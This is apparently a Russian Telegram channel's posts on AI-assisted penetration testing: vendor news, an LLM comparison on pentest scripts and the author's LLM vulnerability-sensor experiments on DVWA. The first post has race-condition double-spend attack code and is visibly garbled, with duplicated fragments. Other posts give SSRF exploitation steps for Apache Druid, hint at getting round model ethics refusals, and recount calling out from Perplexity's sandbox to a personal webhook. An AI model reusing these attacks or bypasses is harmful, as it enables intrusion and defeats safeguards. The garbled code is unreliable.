Заметки Шляпника
200 subscribers
79 photos
18 videos
27 files
105 links
Оставляю заметки о новостях в кибербезопасности и ИИ.

Сервисы DWVA, WebHook - www.tinrae.ru
Развернутые статьи (EN)- www.tinrae.com
Download Telegram
Escape Agentic Pentesting на реальном кейсе Pinterest API.

Pinterest использует Agentic LLM для API workflow testing.

Обнаружили race condition в checkout flow: два запроса /purchase с интервалом <50ms - double spend без double charge.
API.

Pinterest использует Agentic LLM
x2 → 2 items, 1 payment.


Как реализовали

# Escape Agent pattern (адаптируйте)
class RaceAgent:
def test_checkout(self, api_base):
session = self.login("user")
# Baseline
resp1 = post(f"{api_base}/purchase", json={"item":123}, headers=session)

# Race: parallel + timing < server debounce
import asyncio
async def race_attack():
tasks = [post(f"{api_base}/purchase", json={"item":123}, headers=session)
for _ in range(2)]
return await asyncio.gather(*tasks, return_exceptions=True)

results = asyncio.run(race_attack())
if all(r.status==200 for r in results if not isinstance(r, Exception)):
return {"severity": "CRITICAL", "poc": "double_spend"}


RAG prompt:
       return await asyncio.gather(*tasks, return_exceptions=True)

results = a


Как использовать у себя

# 1. Соберите OpenAPI вашего API
escape init myapi --spec checkout.yaml


# 2. Race condition template
escape scan --agent RaceAgent --endpoint /purchase --payloads '{"qty": [1,999]}'


# 3. Custom timing attacks
escape custom --script race_checkout.py


Метрика: 87% business logic coverage, 12% false positives.

#ai #PentestAI
😁1🤨1
🚀 XBOW меняет правила игры в пентесте! Деньги вернут, если уязвимостей не найдено.

15 января XBOW запустили killer-фичу: on-demand PenTest для веб-приложений. Запускаешь тест за минуты, ИИ-агенты ищут глубоко, и если ничего не нашли — полный рефанд! 💰

Почему это
будет востребовано?
- Стоит от $6k — в 80 раз быстрее ручного теста (часы, вместо 35–100 дней!).
- Плюс: готовые эксплойты, шаги по фиксу и ретекст. API и веб в фокусе, мобайл на подходе в 2026.

Эксперты сравнивают с Novee: XBOW дешевле и шустрее для малого бизнеса, но Novee рвёт в business logic (90% точность).

Также идем на xbow.com/blog — свежак про "Почему LLM галлюцинируют уязвимости"!

#PentestAI #XBOW #Кибербезопасность #Novee
Заметки Шляпника
🚀 XBOW меняет правила игры в пентесте! Деньги вернут, если уязвимостей не найдено. 15 января XBOW запустили killer-фичу: on-demand PenTest для веб-приложений. Запускаешь тест за минуты, ИИ-агенты ищут глубоко, и если ничего не нашли — полный рефанд! 💰 Почему…
#LLMHallucinations #AIPentest

Разбор - Как XBOW побеждает галлюцинации LLM в пентесте!
LLM в пентесте "галлюцинируют" — выдают фейковые vulns без PoC, это частая проблема с которой я сталкиваюсь.
Что предлогает XBOW: валидация Proof-of-Concept! Каждый агент реально эксплуатирует цель(жестко указывать на составления скрипта для эксплуатации, а если столкнитесь с проблемой этики то можно использовать вот это решение), подтверждая impact (shell, data leak), а не чатит теорию.

Технические детали:
- Механизм: Агент генерит payload → применяет → мониторит response (timeouts, anomalies) - верифицирует (e.g., echo back).
- Пример CVE-2025-55182 (React2Shell): Цепочка XSS - hook React - RCE.

***

#XBOW #CVE #DRUID

Глубокий разбор CVE-2025-27888 от XBOW — SSRF байпасы в Apache Druid!

XBOW нашел CVE-2025-27888: SSRF в /druid/coordinator/v1 позволяет internal scans.
URL-парсинг уязвимости — байпасы через encoding/normalization. Идеально для практики в локальной лабе!

Короткие шаги эксплуатации CVE-2025-27888 в Apache Druid сводятся к использованию management proxy через специально сформированный URL для SSRF. Требуется аутентификация пользователя. Уязвимость позволяет перенаправлять запросы на произвольные серверы, что приводит к SSRF, open redirect и потенциально XSS/XSRF.


1. Шаги обнаружения
XBOW начал с анализа прошлых SSRF (например, CVE-2023-0361 в /v2/sql), проверил эндпоинты вроде /druid/indexer/v1/task, затем предположил наличие proxy и вызвал ошибку, подтвердившую его существование. Далее последовала итерация атак на /proxy, пока не сработал crafted URL.

2. Техника эксплуатации
Используйте crafted URL в management proxy: /proxy/<role>@host:port/... или /proxy/<role>?url=... для SSRF или редиректа на attacker-controlled ресурсы. Proxy парсит URL некорректно, перенаправляя на внутренние/внешние хосты; требует включенного proxy (по умолчанию).

3. Пофикс
Обновитесь до Apache Druid 31.0.2 или 32.0.1;
ARES от Assail Inc.

Официальный запуск с февраля 2026
Компания Assail, только что вышедшая из “режима скрытности”, объявила о запуске платформы Ares — первой полностью автономной системы пентестинга на базе AI.

Критическая особенность: Ares может развертывать сотни специализированных AI агентов, каждый сосредоточен на конкретном векторе атаки.

Эти агенты синхронизируются, обмениваются контекстом и выполняют многошаговые цепочки атак как полная команда красных хакеров — но с машинной скоростью.

#news #AIPentest
Обновил Cyber Security Lab — www.tinrae.ru

Главные функции:

Create DVWA — vulnerable app
Create Webhook — ловушка для перехвата HTTP-запросов

Обучающие ресурсы, стало проще их использовать для ИИПентестов:
Six2dez — чеклисты пентеста
HackTricks — техники эксплуатации

Инструменты (кнопка Tools):

Base64/URL — encode/decode для bypass фильтров
• JWT Parser — разбор токенов для API тестов
Hash ID — определение типа хеша (MD5/SHA/bcrypt)
Rev Shell Generator — Bash/Python/NC/PHP/PowerShell
Subdomain Finder — поиск через crt.sh
Obfuscator — обфускация payloads (HTML/Unicode/Hex)

Ежемесячная очистка инстансов, таймер в футере.

#pentest #bugbounty #webtools
Заметки Шляпника pinned «Обновил Cyber Security Lab — www.tinrae.ru Главные функции: • Create DVWA — vulnerable app • Create Webhook — ловушка для перехвата HTTP-запросов Обучающие ресурсы, стало проще их использовать для ИИПентестов: • Six2dez — чеклисты пентеста • HackTricks…»
LLM-баттл: Кто лучше пишет пентест-скрипты?

Прогнал несколько моделей одним промптом на генерацию self-contained Python-скрипта для проверки Nginx-векторов (raw backend, CRLF, path traversal, PURGE, version leak, CVE‑стиль Range).
Один сценарий не делает глобальных выводов, но хорошо показывает разницу в “боевой” пригодности кода.
Так что предлагаю Вам дать мне (подходящий)промт для проверки и я еще раз прогоню.

Промпт-шаблон

```text
You are a professional penetration tester and security researcher.
Создай self-contained Python-скрипт для теста Nginx уязвимостей (raw backend/CRLF/path traversal/PURGE/version leak/CVE).
TARGET RECON: HOST/IP, ports 80/443, nginx, known endpoints...
Скрипт сам запускается, выводит результаты в stdout, без аргументов и лишних зависимостей.
```


Участники

SONAR PRO,
SONAR PRO(DEEP-RESEARCH),
O3,
GPT 5.2,
GEMINI 3 FLASH,
GEMINI 3 PRO,
CLAUDE 4.5 SONNET,
CLAUDE OPUS 4.5,
GROK 4.1 NON-REASONING,
KIMI K2 THINKING

🏆 ТОП-3 чемпионы:

- Sonar Pro – лучший баланс: version leak через regex, продуманный raw backend, path traversal, PURGE, CRLF через POST; чистый структурированный код.
- OpenAI o3 – сильное покрытие: http/https, оба порта, raw backend, traversal, PURGE, аккуратный Range‑тест под CVE‑2017‑7529.
- Claude 4.5 Sonnet – очень “человеческий” скрипт: HEAD/GET, nginx-version regex, несколько traversal‑паттернов, CRLF через заголовки, Range‑проверка; чуть менее универсален по URL, но очень качественный.

Сильные середнячки, но на полступени ниже

- Claude 4.5 Opus – много тестов (raw HTTP в POST, traversal, CRLF Set‑Cookie, метод‑фуззинг), но без явного CVE Range и multi-port.
- Sonar Pro Deep Research, Gemini 3 Pro, Grok 4.1 non‑reasoning, Kimi K2 Thinking – рабочие скрипты с нормальным покрытием, но менее аккуратной логикой и/или структурой, чем у топ‑3.

😬 Слабые на этом кейсе

- Gemini 3 Flash – по сути логирование статусов/Server с захардкоженными путями и почти без логики “vuln/ok”.
- GPT‑5.2 – красивые `VULNERABLE/SAFE`, но условия упрощены и местами странные (например, `url.rstrip()` в traversal).

#Pentest #AI #LLM #CyberSec
👍1
Я немного опешил, я вообще не матерюсь с моделями, а они себе позволяют 😤
Please open Telegram to view this post
VIEW IN TELEGRAM
😁2
Опубликованная на этой неделе исследовательская работа «Towards Cybersecurity Superintelligence: from AI-guided humans to human-guided AI» документирует появление способностей, превосходящих человеческие возможности как в скорости, так и в стратегическом мышлении.

Работа определяет три ключевых вектора с примерами развития ИИ-безопасности:

PentestGPT (2023): Первая система, установившая стандарт LLM-управляемого тестирования на проникновение с улучшением производительности на 228,6% по сравнению с базовыми моделями. Система использовала архитектуру, экспортирующую экспертизу в области безопасности в естественно-языковые указания.

Cybersecurity AI (CAI, 2025): Продемонстрировала автоматическое экспертное выполнение на уровне, недоступном человеку. CAI работает в 3600 раз быстрее, чем человеческие тестеры, и сокращает затраты в 156 раз. В 2025 году CAI заняла первое место на международных соревнованиях, включая победу на Neurogrid CTF с призом в 50 000 долларов.

Generative Cut-the-Rope (G-CTR, 2026): Представляет нейросимволическую архитектуру, встраивающую теоретико-игровое мышление в LLM-агентов. Система удваивает процент успеха и достигает преимущества 2:1 над не-стратегическим ИИ в сценариях Attack&Defense.

#ai #aiPentest #news
🥱1
Эра человеческого кода завершена: что это значит для разработчиков.

Райан Даль, создатель Node.js, заявил в X, что «эра написания кода людьми подошла к концу». Это высказывание вызвало бурные обсуждения в сообществе разработчиков, но что на самом деле имел в виду автор одной из самых популярных платформ для разработки?


Не исчезновение профессии, а эволюция

Даль подчёркивает: речь не о том, что разработчики остаются без работы. Суть в другом — ручное написание синтаксиса перестаёт быть основной ценностью инженера. Работа смещается от «написать каждую строчку кода» к формулированию требований, проектированию архитектуры и верификации результатов, которые генерируют ИИ-инструменты.

#ai #news
LLM‑driven сенсор: как научить ИИ видеть уязвимости по поведению, а не по строкам

Long story short: большинство ранних экспериментов с AI‑детекцией уязвимостей выглядели так — загрузили audit‑логи, дали модели флаг injection=true/false, проверили точность.

Работает для стенда, но в продакшене быстро упирается в контекст: модель видит “admin”, “users” и решает, что это SQLi, хотя это просто интерфейс.

Я столкнулся с этой проблемой, когда подключил LLM к DVWA и понял — модель учится не “понятию SQLi”, а просто узнавать строки, характерные для тренажёра. В итоге переносимость нулевая.

Так появилась идея универсального сенсора, который не решает “уязвимость это или нет”, а лишь структурирует поведение приложения. Он строит baseline‑ответ, отправляет payload, сохраняет дифф (HTML, JSON, CLI) и метаданные. Никакой логики, только факты изменений.

ПРИМЕР: Анализ переносится в LLM: она определяет совпадения между типом payload и паттерном диффа.
– SQL‑payload + новые табличные структуры или SQL‑ошибка → SQLi
– файловые пути, /etc/passwd, исходники → LFI/RFI
– отражённый HTML/JS без экранирования → XSS

Важно, что здесь нет жёстких правил про названия полей или таблиц — работает только поведенческая логика.

Архитектура проста:
1. Сенсор фиксирует структурированные различия и флаги вида content_changed, http_error, sensitive_keyword_found;
2. Модель оценивает риски на уровне паттернов поведения.


Это превращает ИИ‑анализ в универсальный слой между пентест‑инструментом и приложением. Теперь модель не “угадывает DVWA”, а интерпретирует реальные признаки аномального поведения.

Что это меняет?
Такой подход формирует новую парадигму — поведенческое восприятие уязвимостей. LLM перестаёт быть распознавателем строк и становится интерпретатором взаимодействия.

Это шаг к созданию Behavior‑diff Sensor Framework — базовой прослойки для автономных AI‑сканеров, которые могут адаптироваться к любому стеку без retrain’а.

Думаю опубликовать первые эксперименты с универсальным дифф‑сенсором — как только добью формат baseline и diff‑структур. Интересно, кто уже пробовал нечто похожее в своих пайплайнах?
Pilot: от discovery к готовым векторам для exploitation за один проход

Предыстория:
После поста про behavior‑diff сенсор логично возникает вопрос — как найти где именно тестировать?
Ручной парсинг HTML, сбор форм и кликабельных элементов с метаданными — рутина, которая съедает часы. Плюс нужно помнить, какие параметры в каких контекстах (vuln_area, main_body, onclick‑попапы).

Решение — pilot(Перове что пришло в голову), скрипт, который за 4 фазы превращает URL в готовый отчёт с приоритетными векторами для exploitation.

Как это работает:
Фаза 1
: Local discovery — парсит HTML, находит формы, кликабельные элементы, трекает in_vuln_area, in_main_body, пути обнаружения (html > body > div.vulnerable_code_area > form > input[name='id']).
Фаза 2: LLM‑генерация сенсора — модель пишет Python‑скрипт для безопасного тестирования обнаруженных параметров (1, 42, test, empty).
Фаза 3: Автофикс — если сенсор упал, модель чинит его по stderr.
Фаза 4: Анализ — LLM выдаёт готовый отчёт с FINDING #N и exploitation guidance.


Результат на DVWA:
FINDING #1: Potential SQL Injection
URL: https://tinrae.ru/.../sqli/
Parameter: id
Discovery Path: html > body.home.light > div#container > div#main_body > div.vulnerable_code_area > form > input[name='id']


Sensor показал: id=1 - 4533 bytes (данные вернулись), id=test - 4474 baseline (нет данных).
Вывод: прямое попадание в SQL WHERE без санитизации.

Что меняет pilot:
Вместо “найди форму - придумай тесты - запусти - проанализируй” получаем end‑to‑end конвейер:

URL → структурированный discovery → поведенческие тесты → готовые векторы exploitation.

Это мост между behavior‑diff сенсором (из предыдущего поста) и реальным pentest: pilot находит где, сенсор тестирует как, LLM создает скрипты и решает уязвимость или нет.
Вот мне нравиться как устроено BB, что у Perplexity что у Google, просто считаем что уязвимости нет и она не входит в программу, а потом исправляем ее.

Начинает подбешивать...

Предыстория: Perplexity сказал что доступ к песочнице это ерунда, ну ладно, подумал я, оставлю для своих целей отправку из песочницы запрос на свой веб-хук, сегодня тестирую и все, не работает, ограничили сволочи внешние запросы..., и каждый раз они еще издеваются и пишут "Спасибо за участие, приходите еще"...

доколе???

&#&$#$$#$ <- тут маты
Qwen3-Max-Thinking от Alibaba превосходит ChatGPT в задачах, требующих структурированного мышления, технического решения проблем и автоматического использования инструментов, согласно обзору Tom's Guide. Модель показывает пошаговую логику, меньше ошибается в сложных сценариях и обходится дешевле — $1.20 за миллион входных токенов.

Ключевые преимущества
- Автоматическое мышление: Модель сама переключается между поиском в вебе, выполнением кода и самопроверкой без подсказок пользователя, в отличие от ChatGPT, где часто нужно уточнять.
- Лучшая точность в сложных задачах: На бенчмарках вроде LiveCodeBench и GPQA-Diamond показывает результаты на уровне или выше GPT-5.2-Thinking, особенно в программировании и агентских сценариях.
- Прозрачность: "Thinking Mode" отображает цепочку рассуждений в реальном времени, повышая доверие к ответам.

Модель особенно полезна для разработчиков и пентестеров в задачах вроде отладки или анализа уязвимостей.

Qwen3-Max-Thinking уступает ChatGPT в скорости отклика и простых задачах, где “тяжёлое мышление” добавляет ненужную задержку. Модель слабее в творческих сценариях, генерации длинных coherent текстов и некоторых нишевых кодовых задачах, где ChatGPT показывает большую надёжность

#ai #llm #pentestAI
1
Документ рассказывает о победе команды FR13NDS TEAM на соревновании KHS 2025, где AI использовался как "допинг" для хакеров.

Основная тема
Это история успеха казахстанской команды (топ-1 в КЗ по CTF), которая выиграла в категории Red Team.

Роль AI
Подробно разбирается, как AI-модели (Gemini 3 Pro, GPT-5.2-Codex, Claude Opus) помогали в реконах, эксплуатации, кодинге и анализе (рейтинги по категориям: Web, Pwn, Forensic). Упомянуты инструменты вроде Warp Terminal, MCP, RAG и vibe hacking с терминалами.

Примеры эксплойтов
- Взлом SPIP CMS, GilaCMS, LuminTech (сессии в DynamoDB).
- Форензика, Pwn-задачи, Blue Team (ELK Stack, forensics).
- Советы по подготовке и Tier List AI-инструментов для CTF.